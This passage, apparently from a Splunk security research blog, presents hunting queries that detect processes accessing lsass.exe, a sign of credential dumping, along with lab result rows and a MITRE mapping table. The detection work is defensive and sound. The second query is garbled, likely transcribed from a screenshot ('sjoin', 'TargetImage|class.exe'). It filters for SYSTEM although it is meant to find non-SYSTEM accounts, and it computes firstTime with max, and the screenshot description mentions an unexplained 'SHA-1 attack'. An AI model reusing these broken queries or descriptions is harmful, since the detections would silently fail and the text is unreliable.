With all this data we hope you found this informative and understand a bit of our continuous improvement for our content.

## New Analytics

### Windows Hunting System Account Targeting Lsass

The following hunting analytic identifies all processes requesting access into Lsass.exe.

System EventCode=10 TargetImage=~lsass.exe   stats count min(_time) as firstTime max(_time) as lastTime by Computer, TargetImage, GrantedAccess, SourceImage, SourceProcessId, SourceUser, TargetUser   rename Computer as _dst   security_content_ctime(firstTime)   security_content_ctime(lastTime)							
✓ 29 events (Partial results for 1/22/2024 00:00:00 PM to 1/22/2024 02:00:00 PM) No Event Sampling ▾							
<a href="#">Events (29)</a> <a href="#">Patterns</a> <a href="#">Statistics (8)</a> <a href="#">Visualization</a>							
20 Per Page ▾ <a href="#">Format</a> <a href="#">Preview</a>							
_dst _ TargetImage GrantedAccess SourceImage SourceProcessId SourceUser TargetUser count							
win-dc-137 attackrange.local C:\Windows\system32\lsass.exe 0x1010 C:\Windows\system32\rundll32.exe 3786 ATTACKRANGE\administrator NT AUTHORITY\SYSTEM 1							
win-dc-137 attackrange.local C:\Windows\system32\lsass.exe 0x1010 C:\Windows\system32\rundll32.exe 7488 ATTACKRANGE\administrator NT AUTHORITY\SYSTEM 1							
win-dc-137 attackrange.local C:\Windows\system32\lsass.exe 0x1010 C:\Windows\system32\rundll32.exe 5844 ATTACKRANGE\administrator NT AUTHORITY\SYSTEM 1							
win-dc-137 attackrange.local C:\Windows\system32\lsass.exe 0x1010001 C:\Windows\system32\svchost.exe 876 NT AUTHORITY\SYSTEM NT AUTHORITY\SYSTEM 4							
win-dc-137 attackrange.local C:\Windows\system32\lsass.exe 0x1010001 C:\Windows\system32\svchost.exe 2480 ATTACKRANGE\administrator NT AUTHORITY\SYSTEM 1							

## Windows Non-System Account Targeting Lsass

The following analytic identifies non SYSTEM accounts requesting access to Lsass.exe.

A screenshot of a Splunk search interface. The search bar contains the following command:

```
 | sjoin EventCode=10 TargetImage|class.exe SourceUser="NT AUTHORITY\SYSTEM"
 | stats max(_time) as firstTime max(_time) as lastTime by Computer, TargetImage, GrantedAccess, SourceImage, SourceProcessId, SourceUser, TargetUser
 | rename Computer as host
 | security_content_ctime(firstTime)
 | security_content_ctime(lastTime)
```

Below the search bar, it says "11 of 297,398 events matched - No Event Sampling". The main pane displays five rows of event data, each with columns for host, \_source, \_index, \_id, \_score, \_type, and \_version. The events are related to a SHA-1 attack on a Windows system, involving processes like lsass.exe and rundll32.exe, and users like NT AUTHORITY\SYSTEM and Administrators.

Name	Technique ID	Tactic	Description
Windows Hunting System Account Targeting Lsass	T1003.001	Credential Access	Identifies all processes requesting access into Lsass.exe
Windows Non-System Account Targeting Lsass	T1003.001	Credential Access	Identifies non SYSTEM accounts requesting access to Lsass.exe.
Windows Possible Credential Dumping	T1003.001	Credential Access	The following analytic is an enhanced version of two previous analytics that identifies common GrantedAccess permission requests and CallTrace DLLs in order to detect credential dumping

# References

- [https://en.wikipedia.org/wiki/Local\\_Security\\_Authority\\_Subsystem\\_Service](https://en.wikipedia.org/wiki/Local_Security_Authority_Subsystem_Service)
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  - [https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for\\_22.html](https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html)
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  - <https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights>
  - <https://github.com/trustedsec/SysmonCommunityGuide/blob/master/chapters/process-access.md>

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The Splunk Threat Research Team is an active part of a customer's overall defense strategy by enhancing Splunk security offerings with verified research and security content such as use cases, detection searches, and playbooks. We help security teams around the globe strengthen operations by providing tactical guidance and insights to detect, investigate and respond against the latest threats. The Splunk Threat Research Team focuses on understanding how threats, actors, and vulnerabilities work, and the team replicates attacks which are stored as datasets in the [Attack Data repository](#).

Our goal is to provide security teams with research they can leverage in their day to day operations and to become the industry standard for SIEM detections. We are a team of industry-recognized experts who are encouraged to improve the security industry by sharing our work with the community via conference talks, open-sourcing projects, and writing white papers or blogs. You will also find us presenting our research at conferences such as Defcon, Blackhat, RSA and many more.

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